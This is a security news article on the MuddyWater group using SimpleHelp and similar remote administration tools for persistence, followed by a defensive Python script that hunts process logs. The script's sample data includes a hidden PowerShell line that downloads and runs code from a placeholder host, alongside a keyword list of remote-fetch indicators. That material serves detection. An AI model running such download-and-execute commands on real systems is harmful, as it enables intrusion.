MuddyWater, an Iran-based cybercriminal group, has abused the SimpleHelp remote support software in its threat campaigns. The Iranian threat actor is notorious for relying on legitimate remote administration tools to take control of targeted systems worldwide.
This state-sponsored threat group has previously adopted legitimate remote administration tools such as RemoteUtilities, ScreenConnect, and Syncro. However, a new investigation revealed that the group has begun to use another tool, SimpleHelp, which has helped it maintain persistent access to compromised systems. The group has been employing this tool since June last year.
The MuddyWater threat group emerged in 2017 and has been a significant ally of the Iranian Ministry of Intelligence and Security. The group’s primary targets are Middle Eastern countries, such as Saudi Arabia, Jordan, the United Arab Emirates, Afghanistan, Israel, Iraq, Turkey, Pakistan, and Azerbaijan. Some of its attacks have also reached the United States.
The MuddyWater group could establish persistence in a targeted system through SimpleHelp.
According to investigations, the MuddyWater group was able to maintain persistence in its recent attack through SimpleHelp precisely because it is a legitimate remote device control and management tool: a sanctioned remote support client is far less likely to be flagged than a custom backdoor.
The researchers explained that the threat actors did not need to subvert the tool in any way; they simply installed it and used it for the remote-control role it was built for.
The precise distribution method for the SimpleHelp samples has not yet been established, but the group that used them is notorious for sending spear-phishing messages that contain malicious links.
The recent findings were supported by another researcher earlier this year. That study showed that MuddyWater campaigns in Saudi Arabia and Egypt used the SimpleHelp tool to launch the Ligolo reverse-tunnelling tool and a credential-harvesting malware.
Furthermore, the researchers added that they had observed previously unknown infrastructure run by the group and a PowerShell script that could receive commands from a remote server. These details came out a week after Microsoft described MuddyWater’s attack process and how it carries out catastrophic attacks on hybrid environments under the guise of a ransomware campaign.
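The two detection opportunities in this story are the appearance of legitimate remote administration tools outside an organisation's sanctioned deployment (the RemoteUtilities, ScreenConnect, Syncro and SimpleHelp tooling named above) and PowerShell being used to pull commands from a remote server. The script below is an added example written for this article, not code from the researchers or from any of the vendors named; it runs a simple hunt over constructed process-creation log lines. The log format, the file paths, the host names, the per-host allowlist and the PowerShell keyword heuristic are all assumptions for the example; only the product names come from the article.

```python
import re
from dataclasses import dataclass

# Remote administration tools named in the article. They are legitimate
# software; the signal is their presence on a host where IT never deployed them.
# Matching is by product-name substring in the image path or command line.
WATCHED_TOOLS = ("simplehelp", "remoteutilities", "screenconnect", "syncro")

# Sanctioned deployments: host -> tools approved there. Assumed for the example.
APPROVED = {"helpdesk-01": {"screenconnect"}}

# Generic indicators of PowerShell fetching or decoding remote content.
# Heuristic chosen for this example, not taken from the article.
POWERSHELL_REMOTE_FETCH = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "-encodedcommand", "-enc ",
)

# Assumed single-line process-creation format used by the constructed sample.
LOG_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image="(?P<image>[^"]+)" cmdline="(?P<cmd>[^"]*)"$'
)

# Constructed sample events: one approved ScreenConnect service on the helpdesk
# host, then an unexpected SimpleHelp client and a PowerShell download on a
# finance workstation, followed by benign activity.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z host=helpdesk-01 user=itadmin image="C:\\Program Files (x86)\\ScreenConnect Client\\ScreenConnect.ClientService.exe" cmdline="ScreenConnect.ClientService.exe"
2024-01-01T10:05:00Z host=finance-07 user=jdoe image="C:\\Users\\jdoe\\AppData\\Local\\Temp\\SimpleHelp-Remote-Access.exe" cmdline="SimpleHelp-Remote-Access.exe"
2024-01-01T10:06:00Z host=finance-07 user=jdoe image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" cmdline="powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/c')"
2024-01-01T10:07:00Z host=finance-07 user=jdoe image="C:\\Windows\\System32\\notepad.exe" cmdline="notepad.exe"
"""


@dataclass
class Finding:
    host: str
    user: str
    tool: str
    image: str
    reason: str


def parse_event(line):
    """Return the event fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_tool(image, cmdline):
    """Return the first watched remote admin tool found in the image path or command line."""
    haystack = (image + " " + cmdline).lower()
    for tool in WATCHED_TOOLS:
        if tool in haystack:
            return tool
    return None


def suspicious_powershell(image, cmdline):
    """True when PowerShell is launched with a remote-fetch or encoded-command keyword."""
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return False
    c = cmdline.lower()
    return any(keyword in c for keyword in POWERSHELL_REMOTE_FETCH)


def analyse(log_text):
    """Run both checks over every parseable line and collect findings in order."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        tool = detect_tool(ev["image"], ev["cmd"])
        # A watched tool is only a finding where IT has not sanctioned it.
        if tool and tool not in APPROVED.get(ev["host"], set()):
            findings.append(Finding(ev["host"], ev["user"], tool, ev["image"],
                                    "remote admin tool outside sanctioned deployment"))
        if suspicious_powershell(ev["image"], ev["cmd"]):
            findings.append(Finding(ev["host"], ev["user"], "powershell", ev["image"],
                                    "PowerShell fetching or decoding remote content"))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.host} {f.user} {f.tool}: {f.reason} ({f.image})")
```

Run against the constructed sample, the approved ScreenConnect service on helpdesk-01 produces nothing, while finance-07 yields two findings: the SimpleHelp client running from a user's Temp directory and the PowerShell download. The allowlist is the important design choice: because these tools are legitimate, the detection has to be keyed to where the organisation actually deploys them rather than to the binaries themselves.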
Organisations, especially those in the Middle East, should stay vigilant against these campaigns, as the MuddyWater threat group has found an efficient, legitimate-looking tool to aid its attacks.